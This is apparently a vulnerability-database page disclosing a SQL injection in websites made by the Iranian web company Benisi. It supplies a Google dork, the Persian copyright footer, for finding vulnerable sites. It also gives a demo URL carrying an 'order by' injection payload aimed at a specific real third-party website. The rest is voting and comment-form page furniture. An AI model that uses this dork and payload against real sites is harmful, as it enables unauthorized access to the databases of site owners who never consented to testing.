تمام حقوق اين وبگاه، ویژه شرکت رسانه‌گستر بِنیسی است SQL injection

2020.11.07

Ali Ghasemi (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: "تمام حقوق اين وبگاه، ویژه شرکت رسانه‌گستر بِنیسی است"

# Exploit Title: تمام حقوق اين وبگاه، ویژه شرکت رسانه‌گستر بِنیسی است - SQL Injection vulnerability
# Google Dork: "تمام حقوق اين وبگاه، ویژه شرکت رسانه‌گستر بِنیسی است"
# Date: 2020/7/11
# Category:webapps
# Exploit Author: Ali Ghasemi
# Vendor Homepage: www.benisi.ir
# Tested on: windows 10 , Firefox

Proof of Concept:

Search google Dork: "تمام حقوق اين وبگاه، ویژه شرکت رسانه‌گستر بِنیسی است"

Demo :

http://www.safarejanjali.ir/News.php?NewsItem=380%27%20order%20by%207--+

#############################################################

# Discovered by: Ali Ghasemi(a2006g85)
# Instagram: instagram.com/a2006g85
#############################################################

See this note in RAW Version

Vote for this issue:

91%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

تمام حقوق اين وبگاه، ویژه شرکت رسانه‌گستر بِنیسی است SQL injection

Dork: "تمام حقوق اين وبگاه، ویژه شرکت رسانه‌گستر بِنیسی است"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.